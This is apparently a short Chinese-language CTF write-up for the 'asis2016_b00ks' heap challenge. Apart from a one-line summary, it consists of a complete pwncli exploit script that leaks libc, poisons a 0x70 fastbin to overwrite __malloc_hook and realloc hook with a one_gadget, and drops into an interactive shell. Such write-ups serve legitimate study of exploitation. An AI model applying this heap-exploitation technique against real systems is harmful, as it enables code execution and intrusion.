asis2016_b00ks

asis2016_b00ks

总结

经典的利用fastbin [0x70]，然后攻击__malloc_hook + __realloc_hook的题。只记录下exp。

Exp

from pwncli import *

cli_script()

p = gift['io']
elf = gift['elf']
libc = gift['libc']


def author_name(name="lynne"):
    p.sendlineafter("Enter author name: ", name)


def create(name_size, name, desc_size, desc):
    p.sendlineafter("> ", "1")
    p.sendlineafter("\nEnter book name size: ", str(name_size))
    p.sendafter("Enter book name (Max 32 chars): ", name)
    p.sendlineafter("\nEnter book description size: ", str(desc_size))
    p.sendafter("Enter book description: ", desc)

def delete(idx):
    p.sendlineafter("> ", "2")
    p.sendlineafter("Enter the book id you want to delete: ", str(idx))


def edit(idx, desc):
    p.sendlineafter("> ", "3")
    p.sendlineafter("Enter the book id you want to edit: ", str(idx))
    p.sendlineafter("Enter new book description: ", desc)
    

def show():
    p.sendlineafter("> ", "4")
    return p.recvuntil("\n1. Create a book")


def change_name(name):
    p.sendlineafter("> ", "5")
    p.sendlineafter("Enter author name: ", name)


author_name()

create(0xc0, "a\n", 0x30, flat(0, 0x141, "\x01\n"))
create(0x60, "a\n", 0x60, "a\n")
change_name("a"*0x20)

delete(1)

create(0x20, "a\n", 0x60, "a\n")
msg = show()
idx = msg.index(b"\x7f") + 1

libc_base_addr = u64(msg[idx - 6:idx].ljust(8, b"\x00")) - 0x3c4b78
log_address("libc_base_addr", libc_base_addr)
libc.address = libc_base_addr

one_gadget = libc.offset_to_vaddr(0x4526a)
log_address("one_gadget", one_gadget)
stop()
delete(2)

edit(3, flat([[0] * 5, 0x71, libc.sym['__malloc_hook'] - 0x23, "\n"]))

create(0x60, "a\n", 0x60, "a\n")

p.sendlineafter("> ", "1")
p.sendlineafter("\nEnter book name size: ", str(0x60))
p.sendafter("Enter book name (Max 32 chars): ", flat(["a" * 11, one_gadget, libc.sym['realloc'] + 13, "\n"]))
p.sendlineafter("\nEnter book description size: ", str(0))

p.interactive()

引用与参考

1、My Blog

2、Ctf Wiki

3、pwncli